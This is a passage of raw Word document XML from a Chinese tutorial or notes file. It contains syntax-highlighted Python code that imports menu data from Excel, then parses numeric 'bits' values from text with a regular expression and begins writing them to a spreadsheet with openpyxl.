        <w:t>避免插入重复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>不存在的条目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>新建二级菜单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>menus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=first_module_obj,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>child</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>frontpath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>7</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>role_can_get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=row[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>9</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ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>手动关闭文件句柄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>excel_file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>close</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>JR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>success_msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'import menu excel'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C28351" w14:textId="77777777" w:rsidR="002953BD" w:rsidRPr="000D62FD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6822ED7E" w14:textId="763B7F37" w:rsidR="00683FEE" w:rsidRDefault="0018179A" w:rsidP="0018179A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>excel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA9F78D" w14:textId="77777777" w:rsidR="0018179A" w:rsidRDefault="0018179A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD3B58E" w14:textId="77777777" w:rsidR="0018179A" w:rsidRDefault="0018179A" w:rsidP="0018179A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># encoding=utf-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">openpyxl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>load_workbook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">openpyxl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Workbook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>parseTxt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>list</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data = re.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>findall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2D3139"/>
        </w:rPr>
        <w:t xml:space="preserve">     (\d{5,6}) bits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>content</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>convert2excel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>list</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single_row = [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>txt</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sum = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
